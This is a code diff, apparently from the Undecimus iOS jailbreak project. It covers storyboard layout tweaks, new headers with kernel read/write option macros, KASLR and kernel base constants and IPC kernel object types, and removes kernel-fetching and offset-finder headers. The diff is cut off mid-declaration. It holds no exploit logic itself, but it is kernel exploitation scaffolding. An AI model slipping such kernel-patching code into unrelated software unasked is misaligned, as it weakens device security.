                                             <subviews>
                                                 <button opaque="NO" contentMode="scaleToFill" contentHorizontalAlignment="left" contentVerticalAlignment="center" buttonType="roundedRect" lineBreakMode="middleTruncation" translatesAutoresizingMaskIntoConstraints="NO" id="2UC-PU-PyP">
@@ -1738,7 +1843,7 @@
                                         <rect key="frame" x="0.0" y="847.33333333333337" width="375" height="44"/>
                                         <autoresizingMask key="autoresizingMask"/>
                                         <tableViewCellContentView key="contentView" opaque="NO" clipsSubviews="YES" multipleTouchEnabled="YES" contentMode="center" preservesSuperviewLayoutMargins="YES" insetsLayoutMarginsFromSafeArea="NO" tableViewCell="6Je-hT-H4t" id="Ojg-tk-YxD">
-                                            <rect key="frame" x="0.0" y="0.0" width="375" height="44"/>
+                                            <rect key="frame" x="0.0" y="0.0" width="375" height="43.666666666666664"/>
                                             <autoresizingMask key="autoresizingMask"/>
                                             <subviews>
                                                 <button opaque="NO" contentMode="scaleToFill" contentHorizontalAlignment="left" contentVerticalAlignment="center" buttonType="roundedRect" lineBreakMode="middleTruncation" translatesAutoresizingMaskIntoConstraints="NO" id="3Y3-ax-GGS">
@@ -1767,7 +1872,7 @@
                                         <rect key="frame" x="0.0" y="891.33333333333337" width="375" height="44"/>
                                         <autoresizingMask key="autoresizingMask"/>
                                         <tableViewCellContentView key="contentView" opaque="NO" clipsSubviews="YES" multipleTouchEnabled="YES" contentMode="center" preservesSuperviewLayoutMargins="YES" insetsLayoutMarginsFromSafeArea="NO" tableViewCell="K46-4J-4X5" id="TUR-hi-Fpc">
-                                            <rect key="frame" x="0.0" y="0.0" width="375" height="44"/>
+                                            <rect key="frame" x="0.0" y="0.0" width="375" height="43.666666666666664"/>
                                             <autoresizingMask key="autoresizingMask"/>
                                             <subviews>
                                                 <button opaque="NO" contentMode="scaleToFill" contentHorizontalAlignment="left" contentVerticalAlignment="center" buttonType="roundedRect" lineBreakMode="middleTruncation" translatesAutoresizingMaskIntoConstraints="NO" id="al6-hJ-DhY">
@@ -1796,7 +1901,7 @@
                                         <rect key="frame" x="0.0" y="935.33333333333337" width="375" height="44"/>
                                         <autoresizingMask key="autoresizingMask"/>
                                         <tableViewCellContentView key="contentView" opaque="NO" clipsSubviews="YES" multipleTouchEnabled="YES" contentMode="center" preservesSuperviewLayoutMargins="YES" insetsLayoutMarginsFromSafeArea="NO" tableViewCell="a3m-H6-I2T" id="bdP-Bb-d1U">
-                                            <rect key="frame" x="0.0" y="0.0" width="375" height="44"/>
+                                            <rect key="frame" x="0.0" y="0.0" width="375" height="43.666666666666664"/>
                                             <autoresizingMask key="autoresizingMask"/>
                                             <subviews>
                                                 <button opaque="NO" contentMode="scaleToFill" contentHorizontalAlignment="left" contentVerticalAlignment="center" buttonType="roundedRect" lineBreakMode="middleTruncation" translatesAutoresizingMaskIntoConstraints="NO" id="6oU-Vx-5nY">
@@ -1825,7 +1930,7 @@
                                         <rect key="frame" x="0.0" y="979.33333333333337" width="375" height="44"/>
                                         <autoresizingMask key="autoresizingMask"/>
                                         <tableViewCellContentView key="contentView" opaque="NO" clipsSubviews="YES" multipleTouchEnabled="YES" contentMode="center" preservesSuperviewLayoutMargins="YES" insetsLayoutMarginsFromSafeArea="NO" tableViewCell="jrp-kZ-kGz" id="dlV-V2-1Of">
-                                            <rect key="frame" x="0.0" y="0.0" width="375" height="44"/>
+                                            <rect key="frame" x="0.0" y="0.0" width="375" height="43.666666666666664"/>
                                             <autoresizingMask key="autoresizingMask"/>
                                             <subviews>
                                                 <button opaque="NO" contentMode="scaleToFill" contentHorizontalAlignment="left" contentVerticalAlignment="center" buttonType="roundedRect" lineBreakMode="middleTruncation" translatesAutoresizingMaskIntoConstraints="NO" id="HS5-KH-MzO">
@@ -1851,10 +1956,10 @@
                                         <color key="backgroundColor" white="0.0" alpha="0.0" colorSpace="custom" customColorSpace="genericGamma22GrayColorSpace"/>
                                     </tableViewCell>
                                     <tableViewCell clipsSubviews="YES" contentMode="scaleToFill" preservesSuperviewLayoutMargins="YES" selectionStyle="none" indentationWidth="10" id="2wN-5M-FuK">
-                                        <rect key="frame" x="0.0" y="1023.3333333333335" width="375" height="44"/>
+                                        <rect key="frame" x="0.0" y="1023.3333333333334" width="375" height="44"/>
                                         <autoresizingMask key="autoresizingMask"/>
                                         <tableViewCellContentView key="contentView" opaque="NO" clipsSubviews="YES" multipleTouchEnabled="YES" contentMode="center" preservesSuperviewLayoutMargins="YES" insetsLayoutMarginsFromSafeArea="NO" tableViewCell="2wN-5M-FuK" id="qsg-EE-xwA">
-                                            <rect key="frame" x="0.0" y="0.0" width="375" height="44"/>
+                                            <rect key="frame" x="0.0" y="0.0" width="375" height="43.666666666666664"/>
                                             <autoresizingMask key="autoresizingMask"/>
                                             <subviews>
                                                 <button opaque="NO" contentMode="scaleToFill" contentHorizontalAlignment="left" contentVerticalAlignment="center" buttonType="roundedRect" lineBreakMode="middleTruncation" translatesAutoresizingMaskIntoConstraints="NO" id="F1e-Hh-yMm">
@@ -1883,7 +1988,7 @@
                                         <rect key="frame" x="0.0" y="1067.3333333333335" width="375" height="44"/>
                                         <autoresizingMask key="autoresizingMask"/>
                                         <tableViewCellContentView key="contentView" opaque="NO" clipsSubviews="YES" multipleTouchEnabled="YES" contentMode="center" preservesSuperviewLayoutMargins="YES" insetsLayoutMarginsFromSafeArea="NO" tableViewCell="wN9-uB-6k8" id="ZJu-BD-YxW">
-                                            <rect key="frame" x="0.0" y="0.0" width="375" height="44"/>
+                                            <rect key="frame" x="0.0" y="0.0" width="375" height="43.666666666666664"/>
                                             <autoresizingMask key="autoresizingMask"/>
                                             <subviews>
                                                 <button opaque="NO" contentMode="scaleToFill" contentHorizontalAlignment="left" contentVerticalAlignment="center" buttonType="roundedRect" lineBreakMode="middleTruncation" translatesAutoresizingMaskIntoConstraints="NO" id="DEj-Uu-Ma8">
@@ -1912,7 +2017,7 @@
                                         <rect key="frame" x="0.0" y="1111.3333333333335" width="375" height="44"/>
                                         <autoresizingMask key="autoresizingMask"/>
                                         <tableViewCellContentView key="contentView" opaque="NO" clipsSubviews="YES" multipleTouchEnabled="YES" contentMode="center" preservesSuperviewLayoutMargins="YES" insetsLayoutMarginsFromSafeArea="NO" tableViewCell="NfW-x4-NDs" id="XYe-kQ-1Jy">
-                                            <rect key="frame" x="0.0" y="0.0" width="375" height="44"/>
+                                            <rect key="frame" x="0.0" y="0.0" width="375" height="43.666666666666664"/>
                                             <autoresizingMask key="autoresizingMask"/>
                                             <subviews>
                                                 <button opaque="NO" contentMode="scaleToFill" contentHorizontalAlignment="left" contentVerticalAlignment="center" buttonType="roundedRect" lineBreakMode="middleTruncation" translatesAutoresizingMaskIntoConstraints="NO" id="xac-Lp-S05">
@@ -1941,7 +2046,7 @@
                                         <rect key="frame" x="0.0" y="1155.3333333333335" width="375" height="44"/>
                                         <autoresizingMask key="autoresizingMask"/>
                                         <tableViewCellContentView key="contentView" opaque="NO" clipsSubviews="YES" multipleTouchEnabled="YES" contentMode="center" preservesSuperviewLayoutMargins="YES" insetsLayoutMarginsFromSafeArea="NO" tableViewCell="TTa-w8-C7e" id="4S5-oW-IMo">
-                                            <rect key="frame" x="0.0" y="0.0" width="375" height="44"/>
+                                            <rect key="frame" x="0.0" y="0.0" width="375" height="43.666666666666664"/>
                                             <autoresizingMask key="autoresizingMask"/>
                                             <subviews>
                                                 <button opaque="NO" contentMode="scaleToFill" contentHorizontalAlignment="left" contentVerticalAlignment="center" buttonType="roundedRect" lineBreakMode="middleTruncation" translatesAutoresizingMaskIntoConstraints="NO" id="H4Q-eb-ujP">
@@ -1970,7 +2075,7 @@
                                         <rect key="frame" x="0.0" y="1199.3333333333335" width="375" height="44"/>
                                         <autoresizingMask key="autoresizingMask"/>
                                         <tableViewCellContentView key="contentView" opaque="NO" clipsSubviews="YES" multipleTouchEnabled="YES" contentMode="center" preservesSuperviewLayoutMargins="YES" insetsLayoutMarginsFromSafeArea="NO" tableViewCell="afy-0W-0PF" id="2wb-pY-dn2">
-                                            <rect key="frame" x="0.0" y="0.0" width="375" height="44"/>
+                                            <rect key="frame" x="0.0" y="0.0" width="375" height="43.666666666666664"/>
                                             <autoresizingMask key="autoresizingMask"/>
                                             <subviews>
                                                 <button opaque="NO" contentMode="scaleToFill" contentHorizontalAlignment="left" contentVerticalAlignment="center" buttonType="roundedRect" lineBreakMode="middleTruncation" translatesAutoresizingMaskIntoConstraints="NO" id="Tws-vS-kLC">
@@ -1999,7 +2104,7 @@
                                         <rect key="frame" x="0.0" y="1243.3333333333335" width="375" height="44"/>
                                         <autoresizingMask key="autoresizingMask"/>
                                         <tableViewCellContentView key="contentView" opaque="NO" clipsSubviews="YES" multipleTouchEnabled="YES" contentMode="center" preservesSuperviewLayoutMargins="YES" insetsLayoutMarginsFromSafeArea="NO" tableViewCell="CFc-nb-uKC" id="c4i-Lb-Ci9">
-                                            <rect key="frame" x="0.0" y="0.0" width="375" height="44"/>
+                                            <rect key="frame" x="0.0" y="0.0" width="375" height="43.666666666666664"/>
                                             <autoresizingMask key="autoresizingMask"/>
                                             <subviews>
                                                 <button opaque="NO" contentMode="scaleToFill" contentHorizontalAlignment="left" contentVerticalAlignment="center" buttonType="roundedRect" lineBreakMode="middleTruncation" translatesAutoresizingMaskIntoConstraints="NO" id="AJL-Pv-miJ">
@@ -2028,7 +2133,7 @@
                                         <rect key="frame" x="0.0" y="1287.3333333333335" width="375" height="44"/>
                                         <autoresizingMask key="autoresizingMask"/>
                                         <tableViewCellContentView key="contentView" opaque="NO" clipsSubviews="YES" multipleTouchEnabled="YES" contentMode="center" preservesSuperviewLayoutMargins="YES" insetsLayoutMarginsFromSafeArea="NO" tableViewCell="djf-Cy-L0f" id="Rdg-LP-0nV">
-                                            <rect key="frame" x="0.0" y="0.0" width="375" height="44"/>
+                                            <rect key="frame" x="0.0" y="0.0" width="375" height="43.666666666666664"/>
                                             <autoresizingMask key="autoresizingMask"/>
                                             <subviews>
                                                 <button opaque="NO" contentMode="scaleToFill" contentHorizontalAlignment="left" contentVerticalAlignment="center" buttonType="roundedRect" lineBreakMode="middleTruncation" translatesAutoresizingMaskIntoConstraints="NO" id="j0H-tW-4d7">
@@ -2057,7 +2162,7 @@
                                         <rect key="frame" x="0.0" y="1331.3333333333335" width="375" height="44"/>
                                         <autoresizingMask key="autoresizingMask"/>
                                         <tableViewCellContentView key="contentView" opaque="NO" clipsSubviews="YES" multipleTouchEnabled="YES" contentMode="center" preservesSuperviewLayoutMargins="YES" insetsLayoutMarginsFromSafeArea="NO" tableViewCell="AGm-v9-SAz" id="u6w-tl-T7u">
-                                            <rect key="frame" x="0.0" y="0.0" width="375" height="44"/>
+                                            <rect key="frame" x="0.0" y="0.0" width="375" height="43.666666666666664"/>
                                             <autoresizingMask key="autoresizingMask"/>
                                             <subviews>
                                                 <button opaque="NO" contentMode="scaleToFill" contentHorizontalAlignment="left" contentVerticalAlignment="center" buttonType="roundedRect" lineBreakMode="middleTruncation" translatesAutoresizingMaskIntoConstraints="NO" id="Bbw-aZ-BIx">
@@ -2086,7 +2191,7 @@
                                         <rect key="frame" x="0.0" y="1375.3333333333335" width="375" height="44"/>
                                         <autoresizingMask key="autoresizingMask"/>
                                         <tableViewCellContentView key="contentView" opaque="NO" clipsSubviews="YES" multipleTouchEnabled="YES" contentMode="center" preservesSuperviewLayoutMargins="YES" insetsLayoutMarginsFromSafeArea="NO" tableViewCell="SeN-mT-hYg" id="BUb-hq-LYk">
-                                            <rect key="frame" x="0.0" y="0.0" width="375" height="44"/>
+                                            <rect key="frame" x="0.0" y="0.0" width="375" height="43.666666666666664"/>
                                             <autoresizingMask key="autoresizingMask"/>
                                             <subviews>
                                                 <button opaque="NO" contentMode="scaleToFill" contentHorizontalAlignment="left" contentVerticalAlignment="center" buttonType="roundedRect" lineBreakMode="middleTruncation" translatesAutoresizingMaskIntoConstraints="NO" id="x5m-Hc-IqE">
@@ -2115,7 +2220,7 @@
                                         <rect key="frame" x="0.0" y="1419.3333333333335" width="375" height="44"/>
                                         <autoresizingMask key="autoresizingMask"/>
                                         <tableViewCellContentView key="contentView" opaque="NO" clipsSubviews="YES" multipleTouchEnabled="YES" contentMode="center" preservesSuperviewLayoutMargins="YES" insetsLayoutMarginsFromSafeArea="NO" tableViewCell="laI-p6-hFE" id="c7T-Sx-cCK">
-                                            <rect key="frame" x="0.0" y="0.0" width="375" height="44"/>
+                                            <rect key="frame" x="0.0" y="0.0" width="375" height="43.666666666666664"/>
                                             <autoresizingMask key="autoresizingMask"/>
                                             <subviews>
                                                 <button opaque="NO" contentMode="scaleToFill" contentHorizontalAlignment="left" contentVerticalAlignment="center" buttonType="roundedRect" lineBreakMode="middleTruncation" translatesAutoresizingMaskIntoConstraints="NO" id="eYc-8d-AIT">
@@ -2144,7 +2249,7 @@
                                         <rect key="frame" x="0.0" y="1463.3333333333335" width="375" height="44"/>
                                         <autoresizingMask key="autoresizingMask"/>
                                         <tableViewCellContentView key="contentView" opaque="NO" clipsSubviews="YES" multipleTouchEnabled="YES" contentMode="center" preservesSuperviewLayoutMargins="YES" insetsLayoutMarginsFromSafeArea="NO" tableViewCell="a8A-LV-2s7" id="bBV-qw-YRP">
-                                            <rect key="frame" x="0.0" y="0.0" width="375" height="44"/>
+                                            <rect key="frame" x="0.0" y="0.0" width="375" height="43.666666666666664"/>
                                             <autoresizingMask key="autoresizingMask"/>
                                             <subviews>
                                                 <button opaque="NO" contentMode="scaleToFill" contentHorizontalAlignment="left" contentVerticalAlignment="center" buttonType="roundedRect" lineBreakMode="middleTruncation" translatesAutoresizingMaskIntoConstraints="NO" id="zA5-7U-XNX">

Undecimus/include/UIProgressHUD.h

@@ -0,0 +1,33 @@
+#import <UIKit/UIKit.h>
+
+@class UIProgressIndicator, UILabel, UIImageView, UIWindow;
+
+@interface UIProgressHUD : UIView {
+
+	UIProgressIndicator* _progressIndicator;
+	UILabel* _progressMessage;
+	UIImageView* _doneView;
+	UIWindow* _parentWindow;
+	struct {
+		unsigned isShowing : 1;
+		unsigned isShowingText : 1;
+		unsigned fixedFrame : 1;
+		unsigned reserved : 30;
+	}  _progressHUDFlags;
+
+}
+-(id)initWithFrame:(CGRect)arg1 ;
+-(void)layoutSubviews;
+-(void)hide;
+-(void)show:(bool)arg1 ;
+-(void)drawRect:(CGRect)arg1 ;
+-(void)dealloc;
+-(void)setText:(id)arg1 ;
+-(id)initWithWindow:(id)arg1 ;
+-(void)done;
+-(void)setFontSize:(int)arg1 ;
+-(id)_progressIndicator;
+-(void)setShowsText:(bool)arg1 ;
+-(void)showInView:(id)arg1 ;
+@end
+

Undecimus/include/common.h

@@ -4,22 +4,54 @@
 #include <stdint.h>             // uint*_t
 #include <stdbool.h>
 #include <mach-o/loader.h>
+#include <mach/error.h>
 #ifdef __OBJC__
 #include <Foundation/Foundation.h>
-#define LOG(str, args...) do { NSLog(@"[*] " str "\n", ##args); } while(false)
+#define RAWLOG(str, args...) do { NSLog(@str, ##args); } while(false)
+#define localize(x) NSLocalizedString(x, @"")
+#define ADDRSTRING(val) [NSString stringWithFormat:@ADDR, val]
 #else
 #include <CoreFoundation/CoreFoundation.h>
 extern void NSLog(CFStringRef, ...);
-#define LOG(str, args...) do { NSLog(CFSTR("[*] " str "\n"), ##args); } while(false)
+#define RAWLOG(str, args...) do { NSLog(CFSTR(str), ##args); } while(false)
+#define BOOL bool
+#define YES ((BOOL) true)
+#define NO ((BOOL) false)
 #endif
 
+#define LOG(str, args...) RAWLOG("[*] " str, ##args)
+
+#define SafeFree(x) do { if (x) free(x); } while(false)
+#define SafeFreeNULL(x) do { SafeFree(x); (x) = NULL; } while(false)
+#define CFSafeRelease(x) do { if (x) CFRelease(x); } while(false)
+#define CFSafeReleaseNULL(x) do { CFSafeRelease(x); (x) = NULL; } while(false)
+
+#define kCFCoreFoundationVersionNumber_iOS_12_0 1535.12
+#define kCFCoreFoundationVersionNumber_iOS_11_3 1452.23
+#define kCFCoreFoundationVersionNumber_iOS_11_0 1443.00
+
+#define auto __auto_type
+
 #define ADDR                 "0x%016llx"
 #define MACH_HEADER_MAGIC    MH_MAGIC_64
 #define MACH_LC_SEGMENT      LC_SEGMENT_64
 typedef struct mach_header_64 mach_hdr_t;
 typedef struct segment_command_64 mach_seg_t;
-typedef uint64_t kptr_t;
 typedef struct load_command mach_lc_t;
+typedef uint64_t kptr_t;
+#define KPTR_NULL ((kptr_t) 0)
+#define KERN_POINTER_VALID(val) ((val) >= 0xffff000000000000 && (val) != 0xffffffffffffffff)
+#define MAX_KASLR_SLIDE 0x21000000
+#define STATIC_KERNEL_BASE_ADDRESS 0xfffffff007004000
+
+extern kptr_t offset_options;
+#define OPT(x) (offset_options?((rk64(offset_options) & OPT_ ##x)?true:false):false)
+#define SETOPT(x) (offset_options?wk64(offset_options, rk64(offset_options) | OPT_ ##x):0)
+#define UNSETOPT(x) (offset_options?wk64(offset_options, rk64(offset_options) & ~OPT_ ##x):0)
+#define OPT_GET_TASK_ALLOW (1<<0)
+#define OPT_CS_DEBUGGED (1<<1)
+
+#define SIZE_NULL ((size_t) 0)
 
 #endif
 

Undecimus/include/iokit.h

@@ -15,8 +15,52 @@ typedef io_object_t io_connect_t;
 typedef io_object_t io_iterator_t;
 
 #define IO_OBJECT_NULL  (0)
+
 #define kIONVRAMForceSyncNowPropertyKey        "IONVRAM-FORCESYNCNOW-PROPERTY"
 
+#define IO_BITS_PORT_INFO   0x0000f000
+#define IO_BITS_KOTYPE      0x00000fff
+#define IO_BITS_OTYPE       0x7fff0000
+#define IO_BITS_ACTIVE      0x80000000
+
+#define IKOT_NONE               0
+#define IKOT_THREAD             1
+#define IKOT_TASK               2
+#define IKOT_HOST               3
+#define IKOT_HOST_PRIV          4
+#define IKOT_PROCESSOR          5
+#define IKOT_PSET               6
+#define IKOT_PSET_NAME          7
+#define IKOT_TIMER              8
+#define IKOT_PAGING_REQUEST     9
+#define IKOT_MIG                10
+#define IKOT_MEMORY_OBJECT      11
+#define IKOT_XMM_PAGER          12
+#define IKOT_XMM_KERNEL         13
+#define IKOT_XMM_REPLY          14
+#define IKOT_UND_REPLY          15
+#define IKOT_HOST_NOTIFY        16
+#define IKOT_HOST_SECURITY      17
+#define IKOT_LEDGER             18
+#define IKOT_MASTER_DEVICE      19
+#define IKOT_TASK_NAME          20
+#define IKOT_SUBSYSTEM          21
+#define IKOT_IO_DONE_QUEUE      22
+#define IKOT_SEMAPHORE          23
+#define IKOT_LOCK_SET           24
+#define IKOT_CLOCK              25
+#define IKOT_CLOCK_CTRL         26
+#define IKOT_IOKIT_SPARE        27
+#define IKOT_NAMED_ENTRY        28
+#define IKOT_IOKIT_CONNECT      29
+#define IKOT_IOKIT_OBJECT       30
+#define IKOT_UPL                31
+#define IKOT_MEM_OBJ_CONTROL    32
+#define IKOT_AU_SESSIONPORT     33
+#define IKOT_FILEPORT           34
+#define IKOT_LABELH             35
+#define IKOT_TASK_RESUME        36
+
 enum
 {
     kIOCFSerializeToBinary          = 0x00000001U,

Undecimus/include/libfragmentzip/libfragmentzip.h

@@ -1,159 +0,0 @@
-//
-//  libfragmentzip.h
-//  libfragmentzip
-//
-//  Created by tihmstar on 24.12.16.
-//  Copyright © 2016 tihmstar. All rights reserved.
-//
-
-#ifndef libfragmentzip_h
-#define libfragmentzip_h
-
-#include <curl/curl.h>
-#include <stdlib.h>
-#include <stdint.h>
-#include <sys/types.h>
-
-#ifdef _WIN32
-#define STATIC_INLINE static __inline
-#define ATTRIBUTE_PACKED
-#pragma pack(push)
-#pragma pack(1)
-#else
-#define STATIC_INLINE static inline
-#define ATTRIBUTE_PACKED __attribute__ ((packed))
-#endif
-
-#define makeBE32(a) makeEndian((char *)(&(a)), 4, 1)
-#define makeLE32(a) makeEndian((char *)(&(a)), 4, 0)
-#define makeBE16(a) makeEndian((char *)(&(a)), 2, 1)
-#define makeLE16(a) makeEndian((char *)(&(a)), 2, 0)
-
-#define fragmentzip_nextCD(cd) ((fragmentzip_cd *)(cd->filename+cd->len_filename+cd->len_extra_field+cd->len_file_comment))
-
-#ifdef __cplusplus
-extern "C"
-{
-#else
-typedef enum{
-    false = 0,
-    true = 1
-}bool;
-#endif
-
-typedef struct{
-    uint32_t signature;
-    uint16_t version;
-    uint16_t flags;
-    uint16_t compression;
-    uint16_t modtime;
-    uint16_t moddate;
-    uint32_t crc32;
-    uint32_t size_compressed;
-    uint32_t size_uncompressed;
-    uint16_t len_filename;
-    uint16_t len_extra_field;
-    char filename[1]; //variable length
-//    char extra_field[]; //variable length
-} ATTRIBUTE_PACKED fragentzip_local_file;
-
-typedef struct{
-    uint32_t crc32;
-    uint32_t size_compressed;
-    uint32_t size_uncompressed;
-} ATTRIBUTE_PACKED fragmentzip_data_descriptor;
-
-typedef struct{
-    uint32_t signature;
-    uint16_t disk_cur_number;
-    uint16_t disk_cd_start_number;
-    uint16_t cd_disk_number;
-    uint16_t cd_entries;
-    uint32_t cd_size;
-    uint32_t cd_start_offset;
-    uint16_t comment_len;
-} ATTRIBUTE_PACKED fragmentzip_end_of_cd;
-
-typedef struct{
-    uint32_t signature;
-    uint16_t version;
-    uint16_t pkzip_version_needed;
-    uint16_t flags;
-    uint16_t compression;
-    uint16_t modtime;
-    uint16_t moddate;
-    uint32_t crc32;
-    uint32_t size_compressed;
-    uint32_t size_uncompressed;
-    uint16_t len_filename;
-    uint16_t len_extra_field;
-    uint16_t len_file_comment;
-    uint16_t disk_num;
-    uint16_t internal_attribute;
-    uint32_t external_attribute;
-    uint32_t local_header_offset;
-    char filename[1]; //variable length
-//    char extra_field[]; //variable length
-//    char file_comment[]; //variable length
-} ATTRIBUTE_PACKED fragmentzip_cd;
-
-
-typedef struct fragmentzip_info{
-    char *url;
-    CURL *mcurl;
-    FILE *localFile;
-    uint64_t length;
-    fragmentzip_cd *cd;
-    fragmentzip_end_of_cd *cd_end;
-} fragmentzip_t;
-
-
-STATIC_INLINE bool isBigEndian(){
-    static const uint32_t tst = 0x41424344;
-    return (bool)__builtin_expect(((char*)&tst)[0] == 0x41,0);
-}
-
-STATIC_INLINE void makeEndian(char * buf, unsigned int size, bool big){
-    if (isBigEndian() != big){
-        switch (size) {
-            case 2:
-                buf[0] ^= buf[1];
-                buf[1] ^= buf[0];
-                buf[0] ^= buf[1];
-                break;
-            case 4:
-                buf[0] ^= buf[3];
-                buf[3] ^= buf[0];
-                buf[0] ^= buf[3];
-                
-                buf[2] ^= buf[1];
-                buf[1] ^= buf[2];
-                buf[2] ^= buf[1];
-                break;
-                
-            default:
-                printf("[FATAL] operation not supported\n");
-                exit(1);
-                break;
-        }
-    }
-}
-
-typedef void (*fragmentzip_process_callback_t)(unsigned int progress);
-
-fragmentzip_t *fragmentzip_open(const char *url);
-fragmentzip_t *fragmentzip_open_extended(const char *url, CURL *mcurl); //pass custom CURL with web auth by basic/digest or cookies
-
-int fragmentzip_download_file(fragmentzip_t *info, const char *remotepath, const char *savepath, fragmentzip_process_callback_t callback);
-void fragmentzip_close(fragmentzip_t *info);
-
-fragmentzip_cd *fragmentzip_getCDForPath(fragmentzip_t *info, const char *path);
-fragmentzip_cd *fragmentzip_getNextCD(fragmentzip_cd *cd);
-
-const char* fragmentzip_version();
-
-#ifdef __cplusplus
-}
-#endif
-
-#endif /* libfragmentzip_h */

Undecimus/include/libgrabkernel/libgrabkernel.h

@@ -1,18 +0,0 @@
-//
-//  libgrabkernel.h
-//  libgrabkernel
-//
-//  Created by tihmstar on 31.01.19.
-//  Copyright © 2019 tihmstar. All rights reserved.
-//
-
-#ifndef libgrabkernel_h
-#define libgrabkernel_h
-
-#include <stdio.h>
-
-const char* libgrabkernel_version(void);
-int grabkernel(char *downloadPath);
-
-
-#endif /* libgrabkernel_h */

Undecimus/include/liboffsetfinder64/exception.hpp

@@ -1,73 +0,0 @@
-//
-//  exception.hpp
-//  liboffsetfinder64
-//
-//  Created by tihmstar on 09.03.18.
-//  Copyright © 2018 tihmstar. All rights reserved.
-//
-
-#ifndef exception_hpp
-#define exception_hpp
-
-#include <string>
-
-namespace tihmstar {
-    class exception : public std::exception{
-        std::string _err;
-        int _code;
-        std::string _build_commit_count;
-        std::string _build_commit_sha;
-        std::string _filename;
-    public:
-        exception(int code, std::string err, std::string filename);
-        
-        //custom error can be used
-        const char *what();
-        
-        /*
-         -first lowest two bytes of code is sourcecode line
-         -next two bytes is strlen of filename in which error happened
-         */
-        int code() const;
-        
-        //Information about build
-        const std::string& build_commit_count() const;
-        const std::string& build_commit_sha() const;
-    };
-    
-    //custom exceptions for makeing it easy to catch
-    class out_of_range : public exception{
-    public:
-        out_of_range(std::string err);
-    };
-    
-    class symbol_not_found : public exception{
-    public:
-        symbol_not_found(int code, std::string sym, std::string filename);
-    };
-    
-    class load_command_not_found : public exception{
-        int _cmd;
-    public:
-        int cmd() const;
-        load_command_not_found(int code, int cmd, std::string filename);
-    };
-    
-    class symtab_not_found : public exception{
-    public:
-        symtab_not_found(int code, std::string err, std::string filename);
-    };
-    
-    class limit_reached : public exception{
-    public:
-        limit_reached(int code, std::string err, std::string filename);
-    };
-    
-    class bad_branch_destination : public exception{
-    public:
-        bad_branch_destination(int code, std::string err, std::string filename);
-    };
-    
-};
-
-#endif /* exception_hpp */

Undecimus/include/liboffsetfinder64/insn.hpp

@@ -1,143 +0,0 @@
-//
-//  insn.hpp
-//  liboffsetfinder64
-//
-//  Created by tihmstar on 09.03.18.
-//  Copyright © 2018 tihmstar. All rights reserved.
-//
-
-#ifndef insn_hpp
-#define insn_hpp
-
-#include <liboffsetfinder64/liboffsetfinder64_common.h>
-#include <vector>
-
-namespace tihmstar{
-    namespace patchfinder64{
-        class insn{
-        public:
-            enum segtype{
-                kText_only,
-                kData_only,
-                kText_and_Data
-            };
-        private:
-            std::pair <loc_t,int> _p;
-            std::vector<text_t> _segments;
-            segtype _segtype;
-        public:
-            insn(segment_t segments, loc_t p = 0, segtype segType = kText_only);
-            insn(const insn &cpy, loc_t p=0);
-            insn &operator++();
-            insn &operator--();
-            insn operator+(int i);
-            insn operator-(int i);
-            insn &operator+=(int i);
-            insn &operator-=(int i);
-            insn &operator=(loc_t p);
-            
-        public: //helpers
-            uint64_t pc();
-            uint32_t value();
-            uint64_t doublevalue();
-            
-        public: //static type determinition
-            static uint64_t deref(segment_t segments, loc_t p);
-            static bool is_adrp(uint32_t i);
-            static bool is_adr(uint32_t i);
-            static bool is_add(uint32_t i);
-            static bool is_bl(uint32_t i);
-            static bool is_cbz(uint32_t i);
-            static bool is_ret(uint32_t i);
-            static bool is_tbnz(uint32_t i);
-            static bool is_br(uint32_t i);
-            static bool is_ldr(uint32_t i);
-            static bool is_cbnz(uint32_t i);
-            static bool is_movk(uint32_t i);
-            static bool is_orr(uint32_t i);
-            static bool is_and(uint32_t i);
-            static bool is_tbz(uint32_t i);
-            static bool is_ldxr(uint32_t i);
-            static bool is_ldrb(uint32_t i);
-            static bool is_str(uint32_t i);
-            static bool is_stp(uint32_t i);
-            static bool is_movz(uint32_t i);
-            static bool is_bcond(uint32_t i);
-            static bool is_b(uint32_t i);
-            static bool is_nop(uint32_t i);
-            
-        public: //type
-            enum type{
-                unknown,
-                adrp,
-                adr,
-                bl,
-                cbz,
-                ret,
-                tbnz,
-                add,
-                br,
-                ldr,
-                cbnz,
-                movk,
-                orr,
-                tbz,
-                ldxr,
-                ldrb,
-                str,
-                stp,
-                movz,
-                bcond,
-                b,
-                nop,
-                and_
-            };
-            enum subtype{
-                st_general,
-                st_register,
-                st_immediate,
-                st_literal
-            };
-            enum supertype{
-                sut_general,
-                sut_branch_imm
-            };
-            enum cond{
-                NE = 000,
-                EG = 000,
-                CS = 001,
-                CC = 001,
-                MI = 010,
-                PL = 010,
-                VS = 011,
-                VC = 011,
-                HI = 100,
-                LS = 100,
-                GE = 101,
-                LT = 101,
-                GT = 110,
-                LE = 110,
-                AL = 111
-            };
-            type type();
-            subtype subtype();
-            supertype supertype();
-            int64_t imm();
-            uint8_t rd();
-            uint8_t rn();
-            uint8_t rt();
-            uint8_t other();
-        public: //cast operators
-            operator void*();
-            operator loc_t();
-            operator enum type();
-        };
-        
-        loc_t find_literal_ref(segment_t segemts, loc_t pos, int ignoreTimes = 0);
-        loc_t find_rel_branch_source(insn bdst, bool searchUp, int ignoreTimes=0, int limit = 0);
-        
-    };
-};
-
-
-#endif /* insn_hpp */

Undecimus/include/liboffsetfinder64/liboffsetfinder64.hpp

@@ -1,132 +0,0 @@
-//
-//  offsetfinder64.hpp
-//  offsetfinder64
-//
-//  Created by tihmstar on 10.01.18.
-//  Copyright © 2018 tihmstar. All rights reserved.
-//
-
-#ifndef offsetfinder64_hpp
-#define offsetfinder64_hpp
-
-#include <string>
-#include <stdint.h>
-#include <mach-o/loader.h>
-#include <mach-o/nlist.h>
-#include <mach-o/dyld_images.h>
-#include <vector>
-#include <functional>
-
-#include <stdlib.h>
-#include <liboffsetfinder64/liboffsetfinder64_common.h>
-#include <liboffsetfinder64/insn.hpp>
-#include <liboffsetfinder64/exception.hpp>
-#include <liboffsetfinder64/patch.hpp>
-
-namespace tihmstar {
-    class offsetfinder64 {
-    public:
-        enum tristate{
-            kfalse = 0,
-            ktrue = 1,
-            kuninitialized = 2
-        };
-    private:
-        bool _freeKernel;
-        bool _kernelIsSlid;
-        uint64_t _kslide;
-        uint8_t *_kdata;
-        size_t _ksize;
-        patchfinder64::loc_t _kernel_entry;
-        patchfinder64::loc_t _kernel_base;
-        std::vector<patchfinder64::text_t> _segments;
-        tristate _haveSymtab = kuninitialized;
-        
-        struct symtab_command *__symtab;
-        void loadSegments();
-        __attribute__((always_inline)) struct symtab_command *getSymtab();
-        
-    public:
